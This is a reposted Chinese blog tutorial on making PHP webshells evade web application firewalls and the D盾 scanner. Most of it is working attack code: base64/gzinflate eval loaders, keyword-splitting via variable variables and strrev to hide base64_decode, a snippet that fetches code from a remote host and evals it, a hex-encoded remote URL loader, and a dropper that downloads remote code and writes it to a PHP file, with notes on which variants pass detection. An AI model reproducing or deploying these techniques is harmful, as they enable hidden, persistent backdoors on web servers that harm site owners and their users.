php大马免杀技巧 | bypass waf
生活随笔
收集整理的這篇文章主要介紹了
php大马免杀技巧 | bypass waf
小編覺得挺不錯的,現(xiàn)在分享給大家,幫大家做個參考.
Part 1 前言
?
Part 2 免殺
執(zhí)行代碼
eval 或 preg_replace的/e修飾符來執(zhí)行大馬代碼。
?
?
$a = 'phpinfo();'; eval($a); //eval執(zhí)行php代碼
?
編碼
如果直接去執(zhí)行代碼,是過不了waf的,我們一般需要將大馬源碼進行編碼。
?
?
eval_gzinflate_base64類型加密與解密:
http://www.zhuisu.net/tool/phpencode.php
https://www.mobilefish.com/services/eval_gzinflate_base64/eval_gzinflate_base64.php
?
自己寫腳本加密:
$code= file_get_contents('D:\phpStudy\WWW\Test\Zlib\help.txt'); //大馬源碼路徑 $encode = base64_encode(gzdeflate($code)); //加密函數(shù)自己修改就行 echo $encode; //輸出加密后代碼?
解碼
通過解碼執(zhí)行我們的代碼。
?
?
<?php //加密的代碼 eval(gzinflate(base64_decode('S03OyFdQ8shUKLbMTVOyBgA='))); ?>
?
關(guān)鍵字免殺
// 類型這樣的關(guān)鍵字如果沒有混淆拆分是過不了waf的 eval(gzinflate(base64_decode// 我們需要做的就是關(guān)鍵字免殺免殺?payload
<?php $l='baSe6'; $o='4_dE'; $v='cO'; $e='DE'; $love=$l.$o.$v.$e; $c = "love"; $a=$$c('源碼base64加密'); eval($a); ?><?php $a = strrev('EdOcEd_46eSaB'); $b= $a('源碼base64加密'); eval($b); ?>?
D盾
查殺
?
免殺遠程執(zhí)行 payload
<?php $a=/**/fopen('http://www.xxx.com/s9mf.txt','r');$b='';while(false!=($c=fread($a,8080))){$b.=$c;}print/**/(/**/eval(/**/($c=$b)/**/)/**/);fclose($a);?><?php$s9 = "687474703A2F2F7033733232373538752E626B742E636C6F7564646E2E636F6D2F73396D662E747874";$m="s9"; //遠程URL進行hex編碼$f = file_get_contents(PACK('H*',$$m));eval($f);?>
免殺
?
遠程下載 payload
<?php $a = 'http://www.xx.com/s9mf.txt'; $b = 'file'.'_g'.'et_'.'contents'; $b = $b($a); $c = strrev('stnetnoc_tup_elif'); $c('s9mf.php', $b); ?>
免殺,D盾報了1級,可以完全免殺的,但是覺得沒必要。
?
Part 3 總結(jié)
?
? ? ? ? ? ? ?
?
轉(zhuǎn)載于:https://www.cnblogs.com/s0mf/p/9373471.html
與50位技術(shù)專家面對面20年技術(shù)見證,附贈技術(shù)全景圖總結(jié)
以上是生活随笔為你收集整理的php大马免杀技巧 | bypass waf的全部內(nèi)容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: js去掉字符串中的所有空格
- 下一篇: ng: Can't bind to 'n